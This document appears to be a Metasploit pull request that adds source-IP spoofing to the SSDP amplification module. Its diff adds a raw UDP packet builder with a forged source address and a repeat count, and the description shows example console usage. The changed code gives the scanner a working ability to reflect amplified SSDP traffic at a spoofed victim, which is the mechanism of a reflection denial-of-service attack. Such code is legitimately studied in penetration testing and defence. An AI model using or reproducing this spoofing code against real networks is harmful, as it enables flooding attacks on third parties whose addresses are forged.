### PR TITLE
SSDP SRC IP spoofing 

### DIFF
--- a/lib/msf/core/auxiliary/drdos.rb
+++ b/lib/msf/core/auxiliary/drdos.rb
@@ -8,6 +8,15 @@ module Msf
 ###
 module Auxiliary::DRDoS
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
   def prove_amplification(response_map)
     vulnerable = false
     proofs = []
@@ -41,6 +50,10 @@ module Auxiliary::DRDoS
     end
 
     [ vulnerable, proofs.join(', ') ]
+  end
+
+  def spoofed?
+    !datastore['SRCIP'].nil?
   end
 
 end

--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@@ -69,6 +69,24 @@ module Auxiliary::UDPScanner
     scanner_postscan(batch)
   end
 
+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = data
+    p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
+    1.upto(num_packets) do |x|
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
   # Send a packet to a given host and port
   def scanner_send(data, ip, port)
 

--- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb
+++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb
@@ -7,6 +7,7 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::DRDoS
 
@@ -45,7 +46,12 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def scan_host(ip)
-    scanner_send(@msearch_probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@msearch_probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@msearch_probe, ip, datastore['RPORT'])
+    end
   end
 
   def scanner_process(data, shost, sport)


### PR DESCRIPTION
This PR adds SRC IP spoofing to the SSDP amplification module.

Example usage:

``` text

msf auxiliary(ssdp_amp) > set RHOSTS 10.0.0.60
RHOSTS => 10.0.0.60
msf auxiliary(ssdp_amp) > set SRCIP 10.0.0.61
SRCIP => 10.0.0.61
msf auxiliary(ssdp_amp) > set NUM_REQUESTS 3
NUM_REQUESTS => 3
msf auxiliary(ssdp_amp) > run

[*] Sending SSDP ssdp:all M-SEARCH probes to 10.0.0.60->10.0.0.60 (1 hosts)
[*] Sending 3 packet(s) to 10.0.0.60 from 10.0.0.61
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssdp_amp) > 
```
